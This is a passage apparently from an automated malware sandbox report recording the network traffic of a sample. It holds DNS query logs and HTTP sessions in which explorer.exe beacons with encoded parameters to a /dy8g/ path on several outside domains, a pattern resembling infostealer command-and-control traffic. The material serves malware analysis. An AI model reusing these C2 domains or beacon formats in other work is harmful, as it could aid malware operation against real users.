                                                                  Jul 22, 2021 17:42:39.607366085 CEST53496948.8.8.8192.168.2.6
                                                                  Jul 22, 2021 17:42:57.953447104 CEST5498253192.168.2.68.8.8.8
                                                                  Jul 22, 2021 17:42:58.013339043 CEST53549828.8.8.8192.168.2.6
                                                                  Jul 22, 2021 17:42:59.305155993 CEST5001053192.168.2.68.8.8.8
                                                                  Jul 22, 2021 17:42:59.362071991 CEST53500108.8.8.8192.168.2.6
                                                                  Jul 22, 2021 17:43:10.196938038 CEST6371853192.168.2.68.8.8.8
                                                                  Jul 22, 2021 17:43:10.256752968 CEST53637188.8.8.8192.168.2.6
                                                                  Jul 22, 2021 17:43:11.126398087 CEST6211653192.168.2.68.8.8.8
                                                                  Jul 22, 2021 17:43:11.301726103 CEST6381653192.168.2.68.8.8.8
                                                                  Jul 22, 2021 17:43:11.337713003 CEST53621168.8.8.8192.168.2.6
                                                                  Jul 22, 2021 17:43:11.413774014 CEST53638168.8.8.8192.168.2.6
                                                                  Jul 22, 2021 17:43:12.377896070 CEST5501453192.168.2.68.8.8.8
                                                                  Jul 22, 2021 17:43:12.434833050 CEST53550148.8.8.8192.168.2.6
                                                                  Jul 22, 2021 17:43:12.910334110 CEST6220853192.168.2.68.8.8.8
                                                                  Jul 22, 2021 17:43:12.985701084 CEST53622088.8.8.8192.168.2.6
                                                                  Jul 22, 2021 17:43:13.392081022 CEST5757453192.168.2.68.8.8.8
                                                                  Jul 22, 2021 17:43:13.452209949 CEST53575748.8.8.8192.168.2.6
                                                                  Jul 22, 2021 17:43:14.429198027 CEST5181853192.168.2.68.8.8.8
                                                                  Jul 22, 2021 17:43:14.528397083 CEST5662853192.168.2.68.8.8.8
                                                                  Jul 22, 2021 17:43:14.586556911 CEST53566288.8.8.8192.168.2.6
                                                                  Jul 22, 2021 17:43:14.637433052 CEST53518188.8.8.8192.168.2.6
                                                                  Jul 22, 2021 17:43:15.729002953 CEST6077853192.168.2.68.8.8.8
                                                                  Jul 22, 2021 17:43:15.786372900 CEST53607788.8.8.8192.168.2.6
                                                                  Jul 22, 2021 17:43:16.234397888 CEST5379953192.168.2.68.8.8.8
                                                                  Jul 22, 2021 17:43:16.294121981 CEST53537998.8.8.8192.168.2.6
                                                                  Jul 22, 2021 17:43:16.988153934 CEST5468353192.168.2.68.8.8.8
                                                                  Jul 22, 2021 17:43:17.037671089 CEST53546838.8.8.8192.168.2.6
                                                                  Jul 22, 2021 17:43:18.265986919 CEST5932953192.168.2.68.8.8.8
                                                                  Jul 22, 2021 17:43:18.327318907 CEST53593298.8.8.8192.168.2.6
                                                                  Jul 22, 2021 17:43:19.089314938 CEST6402153192.168.2.68.8.8.8
                                                                  Jul 22, 2021 17:43:19.146363020 CEST53640218.8.8.8192.168.2.6
                                                                  Jul 22, 2021 17:43:21.120238066 CEST5612953192.168.2.68.8.8.8
                                                                  Jul 22, 2021 17:43:21.179997921 CEST53561298.8.8.8192.168.2.6
                                                                  Jul 22, 2021 17:43:22.011571884 CEST5817753192.168.2.68.8.8.8
                                                                  Jul 22, 2021 17:43:22.072957039 CEST53581778.8.8.8192.168.2.6
                                                                  Jul 22, 2021 17:43:23.938721895 CEST5070053192.168.2.68.8.8.8
                                                                  Jul 22, 2021 17:43:24.086940050 CEST53507008.8.8.8192.168.2.6
                                                                  Jul 22, 2021 17:43:29.505934000 CEST5406953192.168.2.68.8.8.8
                                                                  Jul 22, 2021 17:43:30.544126987 CEST5406953192.168.2.68.8.8.8
                                                                  Jul 22, 2021 17:43:31.544264078 CEST5406953192.168.2.68.8.8.8
                                                                  Jul 22, 2021 17:43:31.679512024 CEST53540698.8.8.8192.168.2.6
                                                                  Jul 22, 2021 17:43:31.749258995 CEST53540698.8.8.8192.168.2.6
                                                                  Jul 22, 2021 17:43:32.341495037 CEST53540698.8.8.8192.168.2.6
                                                                  Jul 22, 2021 17:43:36.693537951 CEST6117853192.168.2.68.8.8.8
                                                                  Jul 22, 2021 17:43:36.758774996 CEST53611788.8.8.8192.168.2.6
                                                                  Jul 22, 2021 17:43:40.869638920 CEST5701753192.168.2.68.8.8.8
                                                                  Jul 22, 2021 17:43:40.941163063 CEST53570178.8.8.8192.168.2.6
                                                                  Jul 22, 2021 17:43:44.985136032 CEST5632753192.168.2.68.8.8.8
                                                                  Jul 22, 2021 17:43:45.052967072 CEST53563278.8.8.8192.168.2.6
                                                                  Jul 22, 2021 17:43:46.928169966 CEST5024353192.168.2.68.8.8.8
                                                                  Jul 22, 2021 17:43:46.989679098 CEST53502438.8.8.8192.168.2.6
                                                                  Jul 22, 2021 17:43:47.187015057 CEST6205553192.168.2.68.8.8.8
                                                                  Jul 22, 2021 17:43:47.252425909 CEST53620558.8.8.8192.168.2.6
                                                                  Jul 22, 2021 17:43:52.184102058 CEST6124953192.168.2.68.8.8.8
                                                                  Jul 22, 2021 17:43:52.401670933 CEST53612498.8.8.8192.168.2.6
                                                                  Jul 22, 2021 17:43:57.417082071 CEST6525253192.168.2.68.8.8.8
                                                                  Jul 22, 2021 17:43:57.807579994 CEST53652528.8.8.8192.168.2.6
                                                                  Jul 22, 2021 17:44:03.409462929 CEST6436753192.168.2.68.8.8.8
                                                                  Jul 22, 2021 17:44:03.471841097 CEST53643678.8.8.8192.168.2.6
                                                                  Jul 22, 2021 17:44:08.630681038 CEST5506653192.168.2.68.8.8.8
                                                                  Jul 22, 2021 17:44:08.993699074 CEST53550668.8.8.8192.168.2.6
                                                                  Jul 22, 2021 17:44:14.569951057 CEST6021153192.168.2.68.8.8.8
                                                                  Jul 22, 2021 17:44:14.755909920 CEST53602118.8.8.8192.168.2.6
                                                                  Jul 22, 2021 17:44:20.458342075 CEST5657053192.168.2.68.8.8.8
                                                                  Jul 22, 2021 17:44:20.523808956 CEST53565708.8.8.8192.168.2.6
                                                                  Jul 22, 2021 17:44:25.974387884 CEST5845453192.168.2.68.8.8.8
                                                                  Jul 22, 2021 17:44:26.063608885 CEST53584548.8.8.8192.168.2.6

                                                                  ICMP Packets

                                                                  TimestampSource IPDest IPChecksumCodeType
                                                                  Jul 22, 2021 17:43:31.750777006 CEST192.168.2.68.8.8.8cfff(Port unreachable)Destination Unreachable

                                                                  DNS Queries

                                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                  Jul 22, 2021 17:43:11.126398087 CEST192.168.2.68.8.8.80x1866Standard query (0)www.aizaibali.comA (IP address)IN (0x0001)
                                                                  Jul 22, 2021 17:43:14.429198027 CEST192.168.2.68.8.8.80xd048Standard query (0)www.aizaibali.comA (IP address)IN (0x0001)
                                                                  Jul 22, 2021 17:43:18.265986919 CEST192.168.2.68.8.8.80x82afStandard query (0)www.extinctionbrews.comA (IP address)IN (0x0001)
                                                                  Jul 22, 2021 17:43:23.938721895 CEST192.168.2.68.8.8.80x64c8Standard query (0)www.doityourselfism.comA (IP address)IN (0x0001)
                                                                  Jul 22, 2021 17:43:29.505934000 CEST192.168.2.68.8.8.80xac29Standard query (0)www.xn--vuq722jwngjre.comA (IP address)IN (0x0001)
                                                                  Jul 22, 2021 17:43:30.544126987 CEST192.168.2.68.8.8.80xac29Standard query (0)www.xn--vuq722jwngjre.comA (IP address)IN (0x0001)
                                                                  Jul 22, 2021 17:43:31.544264078 CEST192.168.2.68.8.8.80xac29Standard query (0)www.xn--vuq722jwngjre.comA (IP address)IN (0x0001)
                                                                  Jul 22, 2021 17:43:36.693537951 CEST192.168.2.68.8.8.80xe600Standard query (0)www.ecofingers.comA (IP address)IN (0x0001)
                                                                  Jul 22, 2021 17:43:46.928169966 CEST192.168.2.68.8.8.80xef2dStandard query (0)www.invisiongc.netA (IP address)IN (0x0001)
                                                                  Jul 22, 2021 17:43:52.184102058 CEST192.168.2.68.8.8.80x3cefStandard query (0)www.oikoschain.comA (IP address)IN (0x0001)
                                                                  Jul 22, 2021 17:43:57.417082071 CEST192.168.2.68.8.8.80xfbfcStandard query (0)www.findfoodshop.comA (IP address)IN (0x0001)
                                                                  Jul 22, 2021 17:44:03.409462929 CEST192.168.2.68.8.8.80xa966Standard query (0)www.scuolatua.comA (IP address)IN (0x0001)
                                                                  Jul 22, 2021 17:44:08.630681038 CEST192.168.2.68.8.8.80x71e5Standard query (0)www.okinawarongnho.comA (IP address)IN (0x0001)
                                                                  Jul 22, 2021 17:44:14.569951057 CEST192.168.2.68.8.8.80xf647Standard query (0)www.jorgeporcayo.comA (IP address)IN (0x0001)
                                                                  Jul 22, 2021 17:44:20.458342075 CEST192.168.2.68.8.8.80x9ea4Standard query (0)www.wthcoffee.comA (IP address)IN (0x0001)
                                                                  Jul 22, 2021 17:44:25.974387884 CEST192.168.2.68.8.8.80x669dStandard query (0)www.cwdelrio.comA (IP address)IN (0x0001)

                                                                  DNS Answers

                                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                  Jul 22, 2021 17:43:11.337713003 CEST8.8.8.8192.168.2.60x1866No error (0)www.aizaibali.com154.88.31.204A (IP address)IN (0x0001)
                                                                  Jul 22, 2021 17:43:14.637433052 CEST8.8.8.8192.168.2.60xd048No error (0)www.aizaibali.com154.88.31.204A (IP address)IN (0x0001)
                                                                  Jul 22, 2021 17:43:18.327318907 CEST8.8.8.8192.168.2.60x82afNo error (0)www.extinctionbrews.comextinctionbrews.comCNAME (Canonical name)IN (0x0001)
                                                                  Jul 22, 2021 17:43:18.327318907 CEST8.8.8.8192.168.2.60x82afNo error (0)extinctionbrews.com34.102.136.180A (IP address)IN (0x0001)
                                                                  Jul 22, 2021 17:43:24.086940050 CEST8.8.8.8192.168.2.60x64c8No error (0)www.doityourselfism.comdoityourselfism.comCNAME (Canonical name)IN (0x0001)
                                                                  Jul 22, 2021 17:43:24.086940050 CEST8.8.8.8192.168.2.60x64c8No error (0)doityourselfism.com169.62.77.158A (IP address)IN (0x0001)
                                                                  Jul 22, 2021 17:43:31.679512024 CEST8.8.8.8192.168.2.60xac29Server failure (2)www.xn--vuq722jwngjre.comnonenoneA (IP address)IN (0x0001)
                                                                  Jul 22, 2021 17:43:31.749258995 CEST8.8.8.8192.168.2.60xac29Server failure (2)www.xn--vuq722jwngjre.comnonenoneA (IP address)IN (0x0001)
                                                                  Jul 22, 2021 17:43:32.341495037 CEST8.8.8.8192.168.2.60xac29Server failure (2)www.xn--vuq722jwngjre.comnonenoneA (IP address)IN (0x0001)
                                                                  Jul 22, 2021 17:43:36.758774996 CEST8.8.8.8192.168.2.60xe600No error (0)www.ecofingers.com52.58.78.16A (IP address)IN (0x0001)
                                                                  Jul 22, 2021 17:43:46.989679098 CEST8.8.8.8192.168.2.60xef2dNo error (0)www.invisiongc.netinvisiongc.netCNAME (Canonical name)IN (0x0001)
                                                                  Jul 22, 2021 17:43:46.989679098 CEST8.8.8.8192.168.2.60xef2dNo error (0)invisiongc.net34.102.136.180A (IP address)IN (0x0001)
                                                                  Jul 22, 2021 17:43:52.401670933 CEST8.8.8.8192.168.2.60x3cefName error (3)www.oikoschain.comnonenoneA (IP address)IN (0x0001)
                                                                  Jul 22, 2021 17:43:57.807579994 CEST8.8.8.8192.168.2.60xfbfcNo error (0)www.findfoodshop.com119.59.120.26A (IP address)IN (0x0001)
                                                                  Jul 22, 2021 17:44:03.471841097 CEST8.8.8.8192.168.2.60xa966No error (0)www.scuolatua.com62.149.128.40A (IP address)IN (0x0001)
                                                                  Jul 22, 2021 17:44:08.993699074 CEST8.8.8.8192.168.2.60x71e5No error (0)www.okinawarongnho.comokinawarongnho.comCNAME (Canonical name)IN (0x0001)
                                                                  Jul 22, 2021 17:44:08.993699074 CEST8.8.8.8192.168.2.60x71e5No error (0)okinawarongnho.com103.138.88.11A (IP address)IN (0x0001)
                                                                  Jul 22, 2021 17:44:14.755909920 CEST8.8.8.8192.168.2.60xf647No error (0)www.jorgeporcayo.comjorgeporcayo.comCNAME (Canonical name)IN (0x0001)
                                                                  Jul 22, 2021 17:44:14.755909920 CEST8.8.8.8192.168.2.60xf647No error (0)jorgeporcayo.com162.241.62.54A (IP address)IN (0x0001)
                                                                  Jul 22, 2021 17:44:20.523808956 CEST8.8.8.8192.168.2.60x9ea4No error (0)www.wthcoffee.comwthcoffee.comCNAME (Canonical name)IN (0x0001)
                                                                  Jul 22, 2021 17:44:20.523808956 CEST8.8.8.8192.168.2.60x9ea4No error (0)wthcoffee.com184.168.131.241A (IP address)IN (0x0001)
                                                                  Jul 22, 2021 17:44:26.063608885 CEST8.8.8.8192.168.2.60x669dName error (3)www.cwdelrio.comnonenoneA (IP address)IN (0x0001)

                                                                  HTTP Request Dependency Graph

                                                                  • www.extinctionbrews.com
                                                                  • www.doityourselfism.com
                                                                  • www.ecofingers.com
                                                                  • www.invisiongc.net
                                                                  • www.findfoodshop.com
                                                                  • www.scuolatua.com
                                                                  • www.okinawarongnho.com
                                                                  • www.jorgeporcayo.com

                                                                  HTTP Packets

                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                  0192.168.2.64974834.102.136.18080C:\Windows\explorer.exe
                                                                  TimestampkBytes transferredDirectionData
                                                                  Jul 22, 2021 17:43:18.792526960 CEST4239OUTGET /dy8g/?i0GDM=DjnY/S7/G1yk/GGdjnbMG0pwlAlipgBY8a8MDSEvYTAaE8/8s3MkSQswoGP3cSH4hj9/IphBwA==&0X=C6Ah3vPx HTTP/1.1
                                                                  Host: www.extinctionbrews.com
                                                                  Connection: close
                                                                  Data Raw: 00 00 00 00 00 00 00
                                                                  Data Ascii:
                                                                  Jul 22, 2021 17:43:18.931600094 CEST4240INHTTP/1.1 403 Forbidden
                                                                  Server: openresty
                                                                  Date: Thu, 22 Jul 2021 15:43:18 GMT
                                                                  Content-Type: text/html
                                                                  Content-Length: 275
                                                                  ETag: "60ef6789-113"
                                                                  Via: 1.1 google
                                                                  Connection: close
                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                                  Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                  1192.168.2.649752169.62.77.15880C:\Windows\explorer.exe
                                                                  TimestampkBytes transferredDirectionData
                                                                  Jul 22, 2021 17:43:24.283298969 CEST7468OUTGET /dy8g/?i0GDM=Y4JBfBjBKMGzbUzrNu+ARLK4ZQab+dap1kq40YSvqSzyJ/mfRg4U9+Lz1eKJfRLK3cAmaa0bkw==&0X=C6Ah3vPx HTTP/1.1
                                                                  Host: www.doityourselfism.com
                                                                  Connection: close
                                                                  Data Raw: 00 00 00 00 00 00 00
                                                                  Data Ascii:
                                                                  Jul 22, 2021 17:43:24.475476027 CEST7469INHTTP/1.1 302 Found
                                                                  Date: Thu, 22 Jul 2021 15:43:24 GMT
                                                                  Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/5.4.16 mod_apreq2-20090110/2.8.0 mod_perl/2.0.11 Perl/v5.16.3
                                                                  Location: http://ww1.doityourselfism.com/?i0GDM=Y4JBfBjBKMGzbUzrNu+ARLK4ZQab+dap1kq40YSvqSzyJ/mfRg4U9+Lz1eKJfRLK3cAmaa0bkw==&0X=C6Ah3vPx
                                                                  Content-Length: 314
                                                                  Connection: close
                                                                  Content-Type: text/html; charset=iso-8859-1
                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 77 77 31 2e 64 6f 69 74 79 6f 75 72 73 65 6c 66 69 73 6d 2e 63 6f 6d 2f 3f 69 30 47 44 4d 3d 59 34 4a 42 66 42 6a 42 4b 4d 47 7a 62 55 7a 72 4e 75 2b 41 52 4c 4b 34 5a 51 61 62 2b 64 61 70 31 6b 71 34 30 59 53 76 71 53 7a 79 4a 2f 6d 66 52 67 34 55 39 2b 4c 7a 31 65 4b 4a 66 52 4c 4b 33 63 41 6d 61 61 30 62 6b 77 3d 3d 26 61 6d 70 3b 30 58 3d 43 36 41 68 33 76 50 78 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>302 Found</title></head><body><h1>Found</h1><p>The document has moved <a href="http://ww1.doityourselfism.com/?i0GDM=Y4JBfBjBKMGzbUzrNu+ARLK4ZQab+dap1kq40YSvqSzyJ/mfRg4U9+Lz1eKJfRLK3cAmaa0bkw==&amp;0X=C6Ah3vPx">here</a>.</p></body></html>


                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                  2192.168.2.64975352.58.78.1680C:\Windows\explorer.exe
                                                                  TimestampkBytes transferredDirectionData
                                                                  Jul 22, 2021 17:43:36.803443909 CEST10370OUTGET /dy8g/?i0GDM=X9Az7RthaT8xdqkxQ6tJRjQeFUHqBPh6fb7YU5dnwYv1rghxnAYW3P4f0krKlocv9Wl7uwWiww==&0X=C6Ah3vPx HTTP/1.1
                                                                  Host: www.ecofingers.com
                                                                  Connection: close
                                                                  Data Raw: 00 00 00 00 00 00 00
                                                                  Data Ascii:
                                                                  Jul 22, 2021 17:43:36.847250938 CEST10370INHTTP/1.1 410 Gone
                                                                  Server: openresty
                                                                  Date: Thu, 22 Jul 2021 15:41:50 GMT
                                                                  Content-Type: text/html
                                                                  Transfer-Encoding: chunked
                                                                  Connection: close
                                                                  Data Raw: 37 0d 0a 3c 68 74 6d 6c 3e 0a 0d 0a 39 0d 0a 20 20 3c 68 65 61 64 3e 0a 0d 0a 34 65 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 27 72 65 66 72 65 73 68 27 20 63 6f 6e 74 65 6e 74 3d 27 35 3b 20 75 72 6c 3d 68 74 74 70 3a 2f 2f 77 77 77 2e 65 63 6f 66 69 6e 67 65 72 73 2e 63 6f 6d 2f 27 20 2f 3e 0a 0d 0a 61 0d 0a 20 20 3c 2f 68 65 61 64 3e 0a 0d 0a 39 0d 0a 20 20 3c 62 6f 64 79 3e 0a 0d 0a 33 61 0d 0a 20 20 20 20 59 6f 75 20 61 72 65 20 62 65 69 6e 67 20 72 65 64 69 72 65 63 74 65 64 20 74 6f 20 68 74 74 70 3a 2f 2f 77 77 77 2e 65 63 6f 66 69 6e 67 65 72 73 2e 63 6f 6d 0a 0d 0a 61 0d 0a 20 20 3c 2f 62 6f 64 79 3e 0a 0d 0a 38 0d 0a 3c 2f 68 74 6d 6c 3e 0a 0d 0a 30 0d 0a 0d 0a
                                                                  Data Ascii: 7<html>9 <head>4e <meta http-equiv='refresh' content='5; url=http://www.ecofingers.com/' />a </head>9 <body>3a You are being redirected to http://www.ecofingers.coma </body>8</html>0


                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                  3192.168.2.64975834.102.136.18080C:\Windows\explorer.exe
                                                                  TimestampkBytes transferredDirectionData
                                                                  Jul 22, 2021 17:43:47.034261942 CEST10389OUTGET /dy8g/?i0GDM=MBhh1pO56K3YrZO9qJkl6N96HaWfS+D/lXW6/vw2t4O2Fl+GB2YqMK2ZraksguVxeKRya9uu2A==&0X=C6Ah3vPx HTTP/1.1
                                                                  Host: www.invisiongc.net
                                                                  Connection: close
                                                                  Data Raw: 00 00 00 00 00 00 00
                                                                  Data Ascii:
                                                                  Jul 22, 2021 17:43:47.172086954 CEST10390INHTTP/1.1 403 Forbidden
                                                                  Server: openresty
                                                                  Date: Thu, 22 Jul 2021 15:43:47 GMT
                                                                  Content-Type: text/html
                                                                  Content-Length: 275
                                                                  ETag: "60f790d8-113"
                                                                  Via: 1.1 google
                                                                  Connection: close
                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                                  Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                  4192.168.2.649760119.59.120.2680C:\Windows\explorer.exe
                                                                  TimestampkBytes transferredDirectionData
                                                                  Jul 22, 2021 17:43:58.054111004 CEST10418OUTGET /dy8g/?i0GDM=4wzaECy4GBTuQnITbNLpu7AOQbyqIYrzJAsJNgGB2dTR99UQwJdt+FpFkOawEfEVdOlYoXAvoA==&0X=C6Ah3vPx HTTP/1.1
                                                                  Host: www.findfoodshop.com
                                                                  Connection: close
                                                                  Data Raw: 00 00 00 00 00 00 00
                                                                  Data Ascii:
                                                                  Jul 22, 2021 17:43:58.298029900 CEST10419INHTTP/1.1 301 Moved Permanently
                                                                  Date: Thu, 22 Jul 2021 15:43:58 GMT
                                                                  Server: Apache/2
                                                                  Location: https://www.findfoodshop.com/dy8g/?i0GDM=4wzaECy4GBTuQnITbNLpu7AOQbyqIYrzJAsJNgGB2dTR99UQwJdt+FpFkOawEfEVdOlYoXAvoA==&0X=C6Ah3vPx
                                                                  Content-Length: 341
                                                                  Connection: close
                                                                  Content-Type: text/html; charset=iso-8859-1
                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 66 69 6e 64 66 6f 6f 64 73 68 6f 70 2e 63 6f 6d 2f 64 79 38 67 2f 3f 69 30 47 44 4d 3d 34 77 7a 61 45 43 79 34 47 42 54 75 51 6e 49 54 62 4e 4c 70 75 37 41 4f 51 62 79 71 49 59 72 7a 4a 41 73 4a 4e 67 47 42 32 64 54 52 39 39 55 51 77 4a 64 74 2b 46 70 46 6b 4f 61 77 45 66 45 56 64 4f 6c 59 6f 58 41 76 6f 41 3d 3d 26 61 6d 70 3b 30 58 3d 43 36 41 68 33 76 50 78 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://www.findfoodshop.com/dy8g/?i0GDM=4wzaECy4GBTuQnITbNLpu7AOQbyqIYrzJAsJNgGB2dTR99UQwJdt+FpFkOawEfEVdOlYoXAvoA==&amp;0X=C6Ah3vPx">here</a>.</p></body></html>


                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                  5192.168.2.64976162.149.128.4080C:\Windows\explorer.exe
                                                                  TimestampkBytes transferredDirectionData
                                                                  Jul 22, 2021 17:44:03.542511940 CEST10420OUTGET /dy8g/?i0GDM=DyFQJ285GCHWDKdZkYvFextRb5KpVMjfJilCoJQfsM3+VBHaRIBYykQk9iPNEqtroWJ/WwLhcg==&0X=C6Ah3vPx HTTP/1.1
                                                                  Host: www.scuolatua.com
                                                                  Connection: close
                                                                  Data Raw: 00 00 00 00 00 00 00
                                                                  Data Ascii:
                                                                  Jul 22, 2021 17:44:03.612077951 CEST10421INHTTP/1.1 404 Not Found
                                                                  Cache-Control: private
                                                                  Content-Type: text/html; charset=utf-8
                                                                  Server: Microsoft-IIS/8.5
                                                                  X-Powered-By: ASP.NET
                                                                  Date: Thu, 22 Jul 2021 15:44:03 GMT
                                                                  Connection: close
                                                                  Content-Length: 5045
                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 20 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 20 0a 3c 68 65 61 64 3e 20 0a 3c 74 69 74 6c 65 3e 49 49 53 20 38 2e 35 20 44 65 74 61 69 6c 65 64 20 45 72 72 6f 72 20 2d 20 34 30 34 2e 30 20 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 20 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 20 0a 3c 21 2d 2d 20 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 41 72 69 61 6c 2c 48 65 6c 76 65 74 69 63 61 2c 73 61 6e 73 2d 73 65 72 69 66 3b 7d 20 0a 63 6f 64 65 7b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 30 30 36 36 30 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 31 65 6d 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 7d 20 0a 2e 63 6f 6e 66 69 67 5f 73 6f 75 72 63 65 20 63 6f 64 65 7b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 38 65 6d 3b 63 6f 6c 6f 72 3a 23 30 30 30 30 30 30 3b 7d 20 0a 70 72 65 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 34 65 6d 3b 77 6f 72 64 2d 77 72 61 70 3a 62 